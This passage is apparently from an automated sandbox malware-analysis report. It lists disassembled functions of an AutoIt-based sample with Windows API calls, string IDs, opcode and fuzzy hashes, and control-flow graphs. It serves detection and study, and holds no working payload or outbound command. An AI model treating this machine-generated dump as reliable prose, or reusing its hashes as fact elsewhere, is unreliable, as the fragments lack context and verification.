                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Variable must be of type 'Object'.$t5o$t5o$t5o$t5o$t5ot5o
                                                                  • API String ID: 0-1618798684
                                                                  • Opcode ID: abf2dc358c9375f27667621cde3470a2ae626a67b39c36897e06e38379359cf9
                                                                  • Instruction ID: 6023e27b9de329e2792f15886b601b8e446812288d096b37164c1b1a9b28a861
                                                                  • Opcode Fuzzy Hash: abf2dc358c9375f27667621cde3470a2ae626a67b39c36897e06e38379359cf9
                                                                  • Instruction Fuzzy Hash: B1C28C71A00625DFDB24CF98D890AADB7B2FF08310F248579E94AAB391D775AD41CF90
                                                                  Function 00630340 Relevance: 15.2, APIs: 3, Strings: 5, Instructions: 1236COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 006315F2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID: t5o$t5o$t5o$t5o$t5ot5o
                                                                  • API String ID: 1385522511-4068516949
                                                                  • Opcode ID: d0cf52202e6adb9ed442222ccc2a1b47e7524a7b2dbf44a55ee6e5a8efec38c9
                                                                  • Instruction ID: f62af0b9c7088b8b72feba78521a8a88ecebf72f4089621bc951f3493fdbc36c
                                                                  • Opcode Fuzzy Hash: d0cf52202e6adb9ed442222ccc2a1b47e7524a7b2dbf44a55ee6e5a8efec38c9
                                                                  • Instruction Fuzzy Hash: 3DB26B74A08351CFEB64CF18C490A6AB7E3BF99300F14895DE98A8B351D771ED49CB92
                                                                  Function 00622793 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 153comCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 0062327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 006232AF
                                                                    • Part of subcall function 0062327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 006232B7
                                                                    • Part of subcall function 0062327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 006232C2
                                                                    • Part of subcall function 0062327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 006232CD
                                                                    • Part of subcall function 0062327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 006232D5
                                                                    • Part of subcall function 0062327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 006232DD
                                                                    • Part of subcall function 00623205: RegisterWindowMessageW.USER32(00000004,?,00622964), ref: 0062325D
                                                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00622A0A
                                                                  • OleInitialize.OLE32 ref: 00622A28
                                                                  • CloseHandle.KERNEL32(00000000,00000000), ref: 00663A0D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                  • String ID: (&o$0$o$4'o$d(o$$o
                                                                  • API String ID: 1986988660-3242521324
                                                                  • Opcode ID: 57a99eaae8bad952f88cc0d12eeed8af6cf0631f4b61a9b8ef724f7cbede3d29
                                                                  • Instruction ID: 7364fa28f2dec7a24ac6db885bbb9ff0e4aa06da84567814b0b1485f4786ed5f
                                                                  • Opcode Fuzzy Hash: 57a99eaae8bad952f88cc0d12eeed8af6cf0631f4b61a9b8ef724f7cbede3d29
                                                                  • Instruction Fuzzy Hash: F3719DB09126178F8788EF79ED796753AE3FB48344740A22ED118CB3A1EB704589DF58
                                                                  Function 006590C5 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1633 6590c5-6590d5 1634 6590d7-6590ea call 64f636 call 64f649 1633->1634 1635 6590ef-6590f1 1633->1635 1649 659471 1634->1649 1636 6590f7-6590fd 1635->1636 1637 659459-659466 call 64f636 call 64f649 1635->1637 1636->1637 1641 659103-65912e 1636->1641 1655 65946c call 652b5c 1637->1655 1641->1637 1644 659134-65913d 1641->1644 1647 659157-659159 1644->1647 1648 65913f-659152 call 64f636 call 64f649 1644->1648 1652 659455-659457 1647->1652 1653 65915f-659163 1647->1653 1648->1655 1654 659474-659479 1649->1654 1652->1654 1653->1652 1657 659169-65916d 1653->1657 1655->1649 1657->1648 1660 65916f-659186 1657->1660 1661 6591a3-6591ac 1660->1661 1662 659188-65918b 1660->1662 1666 6591ae-6591c5 call 64f636 call 64f649 call 652b5c 1661->1666 1667 6591ca-6591d4 1661->1667 1664 659195-65919e 1662->1664 1665 65918d-659193 1662->1665 1668 65923f-659259 1664->1668 1665->1664 1665->1666 1698 65938c 1666->1698 1670 6591d6-6591d8 1667->1670 1671 6591db-6591dc call 653b93 1667->1671 1673 65932d-659336 call 65fc1b 1668->1673 1674 65925f-65926f 1668->1674 1670->1671 1679 6591e1-6591f9 call 652d38 * 2 1671->1679 1687 6593a9 1673->1687 1688 659338-65934a 1673->1688 1674->1673 1678 659275-659277 1674->1678 1678->1673 1683 65927d-6592a3 1678->1683 1702 659216-65923c call 6597a4 1679->1702 1703 6591fb-659211 call 64f649 call 64f636 1679->1703 1683->1673 1684 6592a9-6592bc 1683->1684 1684->1673 1689 6592be-6592c0 1684->1689 1691 6593ad-6593c5 ReadFile 1687->1691 1688->1687 1693 65934c-65935b GetConsoleMode 1688->1693 1689->1673 1694 6592c2-6592ed 1689->1694 1696 6593c7-6593cd 1691->1696 1697 659421-65942c GetLastError 1691->1697 1693->1687 1699 65935d-659361 1693->1699 1694->1673 1701 6592ef-659302 1694->1701 1696->1697 1706 6593cf 1696->1706 1704 659445-659448 1697->1704 1705 65942e-659440 call 64f649 call 64f636 1697->1705 1700 65938f-659399 call 652d38 1698->1700 1699->1691 1707 659363-65937d ReadConsoleW 1699->1707 1700->1654 1701->1673 1709 659304-659306 1701->1709 1702->1668 1703->1698 1716 659385-65938b call 64f613 1704->1716 1717 65944e-659450 1704->1717 1705->1698 1713 6593d2-6593e4 1706->1713 1714 65937f GetLastError 1707->1714 1715 65939e-6593a7 1707->1715 1709->1673 1719 659308-659328 1709->1719 1713->1700 1723 6593e6-6593ea 1713->1723 1714->1716 1715->1713 1716->1698 1717->1700 1719->1673 1728 659403-65940e 1723->1728 1729 6593ec-6593fc call 658de1 1723->1729 1730 659410 call 658f31 1728->1730 1731 65941a-65941f call 658c21 1728->1731 1740 6593ff-659401 1729->1740 1738 659415-659418 1730->1738 1731->1738 1738->1740 1740->1700
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f4cfae9c9d0755fd7dcc70cefc6a3df34789b50bd5c5b47a9e1328e4d3630630
                                                                  • Instruction ID: f12049adbd9d9387b789597cf64e43a2e75fd454731cc053c61d4c1cbe014302
                                                                  • Opcode Fuzzy Hash: f4cfae9c9d0755fd7dcc70cefc6a3df34789b50bd5c5b47a9e1328e4d3630630
                                                                  • Instruction Fuzzy Hash: C9C1D170A04249EFDF11DFA8D841BEDBBB2AF0A311F044199E954AB392C7309D4ACB75
                                                                  Function 006235B3 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1777 6235b3-623623 CreateWindowExW * 2 ShowWindow * 2
                                                                  APIs
                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 006235E1
                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00623602
                                                                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,00623368,?), ref: 00623616
                                                                  • ShowWindow.USER32(00000000,?,?,?,?,?,?,00623368,?), ref: 0062361F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CreateShow
                                                                  • String ID: AutoIt v3$edit
                                                                  • API String ID: 1584632944-3779509399
                                                                  • Opcode ID: 25170f09799a0ee76658410d451ba3601c81bb5fad3637ba981adf489615aa31
                                                                  • Instruction ID: 905b0f1443d64e7846aa5ba77f665322e0c70e60356a28df30b2adae2b848b2a
                                                                  • Opcode Fuzzy Hash: 25170f09799a0ee76658410d451ba3601c81bb5fad3637ba981adf489615aa31
                                                                  • Instruction Fuzzy Hash: 3FF03AB26042967AE7310B17AC19EB73FBFD7C6F10B00102EBA04AB160D6690881DEB0
                                                                  Function 006261A9 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122windowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00665287
                                                                    • Part of subcall function 00628577: _wcslen.LIBCMT ref: 0062858A
                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00626299
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: IconLoadNotifyShell_String_wcslen
                                                                  • String ID: Line %d: $AutoIt -
                                                                  • API String ID: 2289894680-4094128768
                                                                  • Opcode ID: 646de760b472910d61aa9110f8e0eebbd621ac4d70571fa7f1a71337c3c481ee
                                                                  • Instruction ID: aeb1a352a13dc53726bd6ef62897c30692d7e8cedabc46539c1062047b7ea6b9
                                                                  • Opcode Fuzzy Hash: 646de760b472910d61aa9110f8e0eebbd621ac4d70571fa7f1a71337c3c481ee
                                                                  • Instruction Fuzzy Hash: E741D6B2408725AAC351EB60EC51EEF7BDEAF44310F00461EF98592191EF34A649CF9A
                                                                  Function 00658A2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1829 658a2e-658a42 call 655737 1832 658a44-658a46 1829->1832 1833 658a48-658a50 1829->1833 1834 658a96-658ab6 call 6556a6 1832->1834 1835 658a52-658a59 1833->1835 1836 658a5b-658a5e 1833->1836 1844 658ac4 1834->1844 1845 658ab8-658ac2 call 64f613 1834->1845 1835->1836 1837 658a66-658a7a call 655737 * 2 1835->1837 1838 658a60-658a64 1836->1838 1839 658a7c-658a8c call 655737 CloseHandle 1836->1839 1837->1832 1837->1839 1838->1837 1838->1839 1839->1832 1851 658a8e-658a94 GetLastError 1839->1851 1849 658ac6-658ac9 1844->1849 1845->1849 1851->1834
                                                                  APIs
                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,OVf,0065894C,?,006E9CE8,0000000C,006589AB,?,OVf,?,0066564F), ref: 00658A84
                                                                  • GetLastError.KERNEL32 ref: 00658A8E
                                                                  • __dosmaperr.LIBCMT ref: 00658AB9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CloseErrorHandleLast__dosmaperr
                                                                  • String ID: OVf
                                                                  • API String ID: 2583163307-3434556752
                                                                  • Opcode ID: ec59a5f7bbfb4d92a73a8773237d0f4c558913bb2ad76986d350b7a4e0d2548e
                                                                  • Instruction ID: 3096b32d6bafd3685e70537095bbeba4cdc76e4c279cb73e8cff842f0534342e
                                                                  • Opcode Fuzzy Hash: ec59a5f7bbfb4d92a73a8773237d0f4c558913bb2ad76986d350b7a4e0d2548e
                                                                  • Instruction Fuzzy Hash: E8014E326051605ED7646334AC4A7BE67874BC6736F26025EFC15EF6D2DF308D894294
                                                                  Function 006258CB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,006258BE,SwapMouseButtons,00000004,?), ref: 006258EF
                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,006258BE,SwapMouseButtons,00000004,?), ref: 00625910
                                                                  • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,006258BE,SwapMouseButtons,00000004,?), ref: 00625932
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: Control Panel\Mouse
                                                                  • API String ID: 3677997916-824357125
                                                                  • Opcode ID: fb19530232d7b53a4ff072efb6b6b81f1d19a16ca7e883ecdf03df321cd071c1
                                                                  • Instruction ID: 7e250eebb7b0698ec59abc7419e45ce0e398b3bd4e86d5ab9ea75a178ddce756
                                                                  • Opcode Fuzzy Hash: fb19530232d7b53a4ff072efb6b6b81f1d19a16ca7e883ecdf03df321cd071c1
                                                                  • Instruction Fuzzy Hash: 3A1170B5910A68FFDB219F64DC40EEE77BAEF00764F104559F806D7210E2319E819B60
                                                                  Function 00632B20 Relevance: 5.8, APIs: 1, Strings: 2, Instructions: 531COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 00633006
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Init_thread_footer
                                                                  • String ID: CALL$bnh
                                                                  • API String ID: 1385522511-432116625
                                                                  • Opcode ID: c96de55cb4d6a75dfd94151f4755a23d127581011d90b25f5853ca718b12b6b8
                                                                  • Instruction ID: 5f201bbdea194a752a97b55931d2d8aabde682e3a77fa6661e0d4ec3e107b6b8
                                                                  • Opcode Fuzzy Hash: c96de55cb4d6a75dfd94151f4755a23d127581011d90b25f5853ca718b12b6b8
                                                                  • Instruction Fuzzy Hash: 6122AC706083029FD754DF14C891A6ABBF3BF88314F24895DF59A8B3A1D771E941CB92
                                                                  Function 00623A95 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 0066413B
                                                                    • Part of subcall function 00625851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006255D1,?,?,00664B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00625871
                                                                    • Part of subcall function 00623A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00623A76
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Name$Path$FileFullLongOpen
                                                                  • String ID: X$`un
                                                                  • API String ID: 779396738-1367622066
                                                                  • Opcode ID: 70954b28f075e037712dea38f952b946b765bd85be04e3cb902886c31b8f0c8a
                                                                  • Instruction ID: ea8762c00bf401a04b960cb72bc8b495499ba93751920acfbb641bb2e97047f3
                                                                  • Opcode Fuzzy Hash: 70954b28f075e037712dea38f952b946b765bd85be04e3cb902886c31b8f0c8a
                                                                  • Instruction Fuzzy Hash: 58219671A006689BCB51DF94D805BEE7BFEAF45304F008019E545B7381DBF89A898F65
                                                                  Function 0064014B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 006409D8
                                                                    • Part of subcall function 00643614: RaiseException.KERNEL32(?,?,?,006409FA,?,00000000,?,?,?,?,?,?,006409FA,00000000,006E9758,00000000), ref: 00643674
                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 006409F5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Exception@8Throw$ExceptionRaise
                                                                  • String ID: Unknown exception
                                                                  • API String ID: 3476068407-410509341
                                                                  • Opcode ID: 3eb5a73a856a20cb5db91a5390bbf930fbaf32889007658a3f7a409f20ba95be
                                                                  • Instruction ID: 6561499e11bb73b7f41fc8d6c30a2ce0cfea09e51f64fa7f641d74bd05122d37
                                                                  • Opcode Fuzzy Hash: 3eb5a73a856a20cb5db91a5390bbf930fbaf32889007658a3f7a409f20ba95be
                                                                  • Instruction Fuzzy Hash: 38F0223480021DB7EF00BEA4EC02CEE7B6E5E00310B604028BB1497692FB71EA4AC6D4
                                                                  Function 006A89B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 006A8D52
                                                                  • TerminateProcess.KERNEL32(00000000), ref: 006A8D59
                                                                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 006A8F3A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CurrentFreeLibraryTerminate
                                                                  • String ID:
                                                                  • API String ID: 146820519-0
                                                                  • Opcode ID: 03530255a5f9c1f7545ba664ee7d7e1737686183e682806bf9921ebdd4d65a93
                                                                  • Instruction ID: a6b18bcbb4e28b91a5a77c063f2e0060dd38d3a606f5801084733827b6bc5468
                                                                  • Opcode Fuzzy Hash: 03530255a5f9c1f7545ba664ee7d7e1737686183e682806bf9921ebdd4d65a93
                                                                  • Instruction Fuzzy Hash: DE126A71A083119FC754DF28C484B6ABBE6BF89314F14895DE8898B352DB31ED45CF92
                                                                  Function 006A9AF3 Relevance: 4.7, APIs: 3, Instructions: 233COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$_strcat
                                                                  • String ID:
                                                                  • API String ID: 306214811-0
                                                                  • Opcode ID: 815ef52218e933e7c7b2df3f724d91fa1608d723bc1a4c16867e7266b258443e
                                                                  • Instruction ID: ffbee7820c3d588ad4fef72524f3e0765a464da182fe86b251d32507c6d46bfc
                                                                  • Opcode Fuzzy Hash: 815ef52218e933e7c7b2df3f724d91fa1608d723bc1a4c16867e7266b258443e
                                                                  • Instruction Fuzzy Hash: F0A15D31600615DFCB18EF18D5D19A9BBA2FF46314B2084ADE84A8F392DB31ED42CF94
                                                                  Function 0063FCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 006261A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00626299
                                                                  • KillTimer.USER32(?,00000001,?,?), ref: 0063FD36
                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0063FD45
                                                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0067FE33
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell_Timer$Kill
                                                                  • String ID:
